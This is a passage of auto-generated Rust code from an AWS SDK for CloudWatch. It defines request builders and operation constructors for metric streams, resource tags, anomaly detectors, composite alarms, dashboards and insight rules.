fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`ListMetricsInput`](crate::input::ListMetricsInput)
pub fn builder() -> crate::input::list_metrics_input::Builder {
crate::input::list_metrics_input::Builder::default()
}
}
/// See [`ListMetricStreamsInput`](crate::input::ListMetricStreamsInput)
pub mod list_metric_streams_input {
/// A builder for [`ListMetricStreamsInput`](crate::input::ListMetricStreamsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) next_token: std::option::Option<std::string::String>,
pub(crate) max_results: std::option::Option<i32>,
}
impl Builder {
/// <p>Include this value, if it was returned by the previous call, to get the next set of metric streams.</p>
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.next_token = Some(input.into());
self
}
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.next_token = input;
self
}
/// <p>The maximum number of results to return in one operation.</p>
pub fn max_results(mut self, input: i32) -> Self {
self.max_results = Some(input);
self
}
pub fn set_max_results(mut self, input: std::option::Option<i32>) -> Self {
self.max_results = input;
self
}
/// Consumes the builder and constructs a [`ListMetricStreamsInput`](crate::input::ListMetricStreamsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::ListMetricStreamsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::ListMetricStreamsInput {
next_token: self.next_token,
max_results: self.max_results,
})
}
}
}
#[doc(hidden)]
pub type ListMetricStreamsInputOperationOutputAlias = crate::operation::ListMetricStreams;
#[doc(hidden)]
pub type ListMetricStreamsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl ListMetricStreamsInput {
/// Consumes the builder and constructs an Operation<[`ListMetricStreams`](crate::operation::ListMetricStreams)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::ListMetricStreams,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_list_metric_streams(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::ListMetricStreams::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"ListMetricStreams",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`ListMetricStreamsInput`](crate::input::ListMetricStreamsInput)
pub fn builder() -> crate::input::list_metric_streams_input::Builder {
crate::input::list_metric_streams_input::Builder::default()
}
}
/// See [`ListTagsForResourceInput`](crate::input::ListTagsForResourceInput)
pub mod list_tags_for_resource_input {
/// A builder for [`ListTagsForResourceInput`](crate::input::ListTagsForResourceInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) resource_arn: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The ARN of the CloudWatch resource that you want to view tags for.</p>
/// <p>The ARN format of an alarm is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:alarm:<i>alarm-name</i>
/// </code>
/// </p>
/// <p>The ARN format of a Contributor Insights rule is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:insight-rule:<i>insight-rule-name</i>
/// </code>
/// </p>
/// <p>For more information about ARN format, see <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/list_amazoncloudwatch.html#amazoncloudwatch-resources-for-iam-policies"> Resource
/// Types Defined by Amazon CloudWatch</a> in the <i>Amazon Web Services General
/// Reference</i>.</p>
pub fn resource_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.resource_arn = Some(input.into());
self
}
pub fn set_resource_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.resource_arn = input;
self
}
/// Consumes the builder and constructs a [`ListTagsForResourceInput`](crate::input::ListTagsForResourceInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::ListTagsForResourceInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::ListTagsForResourceInput {
resource_arn: self.resource_arn,
})
}
}
}
#[doc(hidden)]
pub type ListTagsForResourceInputOperationOutputAlias = crate::operation::ListTagsForResource;
#[doc(hidden)]
pub type ListTagsForResourceInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl ListTagsForResourceInput {
/// Consumes the builder and constructs an Operation<[`ListTagsForResource`](crate::operation::ListTagsForResource)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::ListTagsForResource,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_list_tags_for_resource(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::ListTagsForResource::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"ListTagsForResource",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`ListTagsForResourceInput`](crate::input::ListTagsForResourceInput)
pub fn builder() -> crate::input::list_tags_for_resource_input::Builder {
crate::input::list_tags_for_resource_input::Builder::default()
}
}
/// See [`PutAnomalyDetectorInput`](crate::input::PutAnomalyDetectorInput)
pub mod put_anomaly_detector_input {
/// A builder for [`PutAnomalyDetectorInput`](crate::input::PutAnomalyDetectorInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) namespace: std::option::Option<std::string::String>,
pub(crate) metric_name: std::option::Option<std::string::String>,
pub(crate) dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
pub(crate) stat: std::option::Option<std::string::String>,
pub(crate) configuration: std::option::Option<crate::model::AnomalyDetectorConfiguration>,
}
impl Builder {
/// <p>The namespace of the metric to create the anomaly detection model for.</p>
pub fn namespace(mut self, input: impl Into<std::string::String>) -> Self {
self.namespace = Some(input.into());
self
}
pub fn set_namespace(mut self, input: std::option::Option<std::string::String>) -> Self {
self.namespace = input;
self
}
/// <p>The name of the metric to create the anomaly detection model for.</p>
pub fn metric_name(mut self, input: impl Into<std::string::String>) -> Self {
self.metric_name = Some(input.into());
self
}
pub fn set_metric_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.metric_name = input;
self
}
pub fn dimensions(mut self, input: impl Into<crate::model::Dimension>) -> Self {
let mut v = self.dimensions.unwrap_or_default();
v.push(input.into());
self.dimensions = Some(v);
self
}
pub fn set_dimensions(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
) -> Self {
self.dimensions = input;
self
}
/// <p>The statistic to use for the metric and the anomaly detection model.</p>
pub fn stat(mut self, input: impl Into<std::string::String>) -> Self {
self.stat = Some(input.into());
self
}
pub fn set_stat(mut self, input: std::option::Option<std::string::String>) -> Self {
self.stat = input;
self
}
/// <p>The configuration specifies details about how the
/// anomaly detection model is to be trained, including
/// time ranges to exclude when training and updating the model.
/// You can specify as many as 10 time ranges.</p>
/// <p>The configuration can also include the time zone to use for
/// the metric.</p>
pub fn configuration(mut self, input: crate::model::AnomalyDetectorConfiguration) -> Self {
self.configuration = Some(input);
self
}
pub fn set_configuration(
mut self,
input: std::option::Option<crate::model::AnomalyDetectorConfiguration>,
) -> Self {
self.configuration = input;
self
}
/// Consumes the builder and constructs a [`PutAnomalyDetectorInput`](crate::input::PutAnomalyDetectorInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::PutAnomalyDetectorInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::PutAnomalyDetectorInput {
namespace: self.namespace,
metric_name: self.metric_name,
dimensions: self.dimensions,
stat: self.stat,
configuration: self.configuration,
})
}
}
}
#[doc(hidden)]
pub type PutAnomalyDetectorInputOperationOutputAlias = crate::operation::PutAnomalyDetector;
#[doc(hidden)]
pub type PutAnomalyDetectorInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl PutAnomalyDetectorInput {
/// Consumes the builder and constructs an Operation<[`PutAnomalyDetector`](crate::operation::PutAnomalyDetector)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::PutAnomalyDetector,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_put_anomaly_detector(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::PutAnomalyDetector::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"PutAnomalyDetector",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`PutAnomalyDetectorInput`](crate::input::PutAnomalyDetectorInput)
pub fn builder() -> crate::input::put_anomaly_detector_input::Builder {
crate::input::put_anomaly_detector_input::Builder::default()
}
}
/// See [`PutCompositeAlarmInput`](crate::input::PutCompositeAlarmInput)
pub mod put_composite_alarm_input {
/// A builder for [`PutCompositeAlarmInput`](crate::input::PutCompositeAlarmInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) actions_enabled: std::option::Option<bool>,
pub(crate) alarm_actions: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) alarm_description: std::option::Option<std::string::String>,
pub(crate) alarm_name: std::option::Option<std::string::String>,
pub(crate) alarm_rule: std::option::Option<std::string::String>,
pub(crate) insufficient_data_actions:
std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) ok_actions: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
}
impl Builder {
/// <p>Indicates whether actions should be executed during any changes to the alarm state of the composite alarm. The default is
/// <code>TRUE</code>.</p>
pub fn actions_enabled(mut self, input: bool) -> Self {
self.actions_enabled = Some(input);
self
}
pub fn set_actions_enabled(mut self, input: std::option::Option<bool>) -> Self {
self.actions_enabled = input;
self
}
pub fn alarm_actions(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.alarm_actions.unwrap_or_default();
v.push(input.into());
self.alarm_actions = Some(v);
self
}
pub fn set_alarm_actions(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.alarm_actions = input;
self
}
/// <p>The description for the composite alarm.</p>
pub fn alarm_description(mut self, input: impl Into<std::string::String>) -> Self {
self.alarm_description = Some(input.into());
self
}
pub fn set_alarm_description(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.alarm_description = input;
self
}
/// <p>The name for the composite alarm. This name must be unique within the Region.</p>
pub fn alarm_name(mut self, input: impl Into<std::string::String>) -> Self {
self.alarm_name = Some(input.into());
self
}
pub fn set_alarm_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.alarm_name = input;
self
}
/// <p>An expression that specifies which other alarms are to be evaluated to determine this
/// composite alarm's state. For each alarm that you reference, you
/// designate a function that
/// specifies whether that alarm needs to be in ALARM state, OK state, or INSUFFICIENT_DATA state. You
/// can use operators (AND, OR and NOT) to combine multiple functions in a single expression. You can use parenthesis to logically group the
/// functions in your expression.</p>
/// <p>You can use either alarm names or ARNs to reference the other alarms that are to be evaluated.</p>
/// <p>Functions can include the following:</p>
/// <ul>
/// <li>
/// <p>
/// <code>ALARM("<i>alarm-name</i> or <i>alarm-ARN</i>")</code> is TRUE if the named
/// alarm is in ALARM state.</p>
/// </li>
/// <li>
/// <p>
/// <code>OK("<i>alarm-name</i> or <i>alarm-ARN</i>")</code> is TRUE if the named
/// alarm is in OK state.</p>
/// </li>
/// <li>
/// <p>
/// <code>INSUFFICIENT_DATA("<i>alarm-name</i> or <i>alarm-ARN</i>")</code> is TRUE if the named
/// alarm is in INSUFFICIENT_DATA state.</p>
/// </li>
/// <li>
/// <p>
/// <code>TRUE</code> always evaluates to TRUE.</p>
/// </li>
/// <li>
/// <p>
/// <code>FALSE</code> always evaluates to FALSE.</p>
/// </li>
/// </ul>
/// <p>TRUE and FALSE are useful for testing a complex <code>AlarmRule</code> structure, and
/// for testing your alarm actions.</p>
/// <p>Alarm names specified in <code>AlarmRule</code> can be surrounded with double-quotes ("), but do not have to be.</p>
/// <p>The following
/// are some examples of <code>AlarmRule</code>:</p>
/// <ul>
/// <li>
/// <p>
/// <code>ALARM(CPUUtilizationTooHigh) AND ALARM(DiskReadOpsTooHigh)</code> specifies that the composite alarm goes into ALARM state only
/// if both CPUUtilizationTooHigh and DiskReadOpsTooHigh alarms are in ALARM state.</p>
/// </li>
/// <li>
/// <p>
/// <code>ALARM(CPUUtilizationTooHigh) AND NOT ALARM(DeploymentInProgress)</code>
/// specifies that the alarm goes to ALARM state if CPUUtilizationTooHigh is in ALARM state
/// and DeploymentInProgress is not in ALARM state. This example reduces
/// alarm noise during a known deployment window.</p>
/// </li>
/// <li>
/// <p>
/// <code>(ALARM(CPUUtilizationTooHigh) OR ALARM(DiskReadOpsTooHigh)) AND OK(NetworkOutTooHigh)</code> goes into ALARM
/// state if CPUUtilizationTooHigh OR DiskReadOpsTooHigh is in ALARM state, and if NetworkOutTooHigh is in OK state.
/// This provides another example of using a composite alarm to prevent noise. This rule ensures that you are not notified with an
/// alarm action on high CPU or disk usage if a known network problem is also occurring.</p>
/// </li>
/// </ul>
/// <p>The <code>AlarmRule</code> can specify as many as 100
/// "children" alarms. The <code>AlarmRule</code> expression can have as many as 500 elements. Elements
/// are child alarms, TRUE or FALSE statements, and
/// parentheses.</p>
pub fn alarm_rule(mut self, input: impl Into<std::string::String>) -> Self {
self.alarm_rule = Some(input.into());
self
}
pub fn set_alarm_rule(mut self, input: std::option::Option<std::string::String>) -> Self {
self.alarm_rule = input;
self
}
pub fn insufficient_data_actions(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.insufficient_data_actions.unwrap_or_default();
v.push(input.into());
self.insufficient_data_actions = Some(v);
self
}
pub fn set_insufficient_data_actions(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.insufficient_data_actions = input;
self
}
pub fn ok_actions(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.ok_actions.unwrap_or_default();
v.push(input.into());
self.ok_actions = Some(v);
self
}
pub fn set_ok_actions(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.ok_actions = input;
self
}
pub fn tags(mut self, input: impl Into<crate::model::Tag>) -> Self {
let mut v = self.tags.unwrap_or_default();
v.push(input.into());
self.tags = Some(v);
self
}
pub fn set_tags(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Tag>>,
) -> Self {
self.tags = input;
self
}
/// Consumes the builder and constructs a [`PutCompositeAlarmInput`](crate::input::PutCompositeAlarmInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::PutCompositeAlarmInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::PutCompositeAlarmInput {
actions_enabled: self.actions_enabled,
alarm_actions: self.alarm_actions,
alarm_description: self.alarm_description,
alarm_name: self.alarm_name,
alarm_rule: self.alarm_rule,
insufficient_data_actions: self.insufficient_data_actions,
ok_actions: self.ok_actions,
tags: self.tags,
})
}
}
}
#[doc(hidden)]
pub type PutCompositeAlarmInputOperationOutputAlias = crate::operation::PutCompositeAlarm;
#[doc(hidden)]
pub type PutCompositeAlarmInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl PutCompositeAlarmInput {
/// Consumes the builder and constructs an Operation<[`PutCompositeAlarm`](crate::operation::PutCompositeAlarm)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::PutCompositeAlarm,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_put_composite_alarm(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::PutCompositeAlarm::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"PutCompositeAlarm",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`PutCompositeAlarmInput`](crate::input::PutCompositeAlarmInput)
pub fn builder() -> crate::input::put_composite_alarm_input::Builder {
crate::input::put_composite_alarm_input::Builder::default()
}
}
/// See [`PutDashboardInput`](crate::input::PutDashboardInput)
pub mod put_dashboard_input {
/// A builder for [`PutDashboardInput`](crate::input::PutDashboardInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) dashboard_name: std::option::Option<std::string::String>,
pub(crate) dashboard_body: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The name of the dashboard. If a dashboard with this name already exists, this call modifies that dashboard, replacing
/// its current contents. Otherwise, a new dashboard is created. The maximum length is 255, and valid characters are
/// A-Z, a-z, 0-9, "-", and "_". This parameter is required.</p>
pub fn dashboard_name(mut self, input: impl Into<std::string::String>) -> Self {
self.dashboard_name = Some(input.into());
self
}
pub fn set_dashboard_name(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.dashboard_name = input;
self
}
/// <p>The detailed information about the dashboard in JSON format, including the widgets to include and their location
/// on the dashboard. This parameter is required.</p>
/// <p>For more information about the syntax,
/// see <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/CloudWatch-Dashboard-Body-Structure.html">Dashboard Body Structure and Syntax</a>.</p>
pub fn dashboard_body(mut self, input: impl Into<std::string::String>) -> Self {
self.dashboard_body = Some(input.into());
self
}
pub fn set_dashboard_body(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.dashboard_body = input;
self
}
/// Consumes the builder and constructs a [`PutDashboardInput`](crate::input::PutDashboardInput)
pub fn build(
self,
) -> std::result::Result<crate::input::PutDashboardInput, smithy_http::operation::BuildError>
{
Ok(crate::input::PutDashboardInput {
dashboard_name: self.dashboard_name,
dashboard_body: self.dashboard_body,
})
}
}
}
#[doc(hidden)]
pub type PutDashboardInputOperationOutputAlias = crate::operation::PutDashboard;
#[doc(hidden)]
pub type PutDashboardInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl PutDashboardInput {
/// Consumes the builder and constructs an Operation<[`PutDashboard`](crate::operation::PutDashboard)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::PutDashboard,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body =
crate::operation_ser::serialize_operation_put_dashboard(&self).map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::PutDashboard::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"PutDashboard",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`PutDashboardInput`](crate::input::PutDashboardInput)
pub fn builder() -> crate::input::put_dashboard_input::Builder {
crate::input::put_dashboard_input::Builder::default()
}
}
/// See [`PutInsightRuleInput`](crate::input::PutInsightRuleInput)
pub mod put_insight_rule_input {
/// A builder for [`PutInsightRuleInput`](crate::input::PutInsightRuleInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) rule_name: std::option::Option<std::string::String>,
pub(crate) rule_state: std::option::Option<std::string::String>,
pub(crate) rule_definition: std::option::Option<std::string::String>,
pub(crate) tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
}
impl Builder {
/// <p>A unique name for the rule.</p>
pub fn rule_name(mut self, input: impl Into<std::string::String>) -> Self {
self.rule_name = Some(input.into());
self
}
pub fn set_rule_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.rule_name = input;
self
}
/// <p>The state of the rule. Valid values are ENABLED and DISABLED.</p>
pub fn rule_state(mut self, input: impl Into<std::string::String>) -> Self {
self.rule_state = Some(input.into());
self
}
pub fn set_rule_state(mut self, input: std::option::Option<std::string::String>) -> Self {
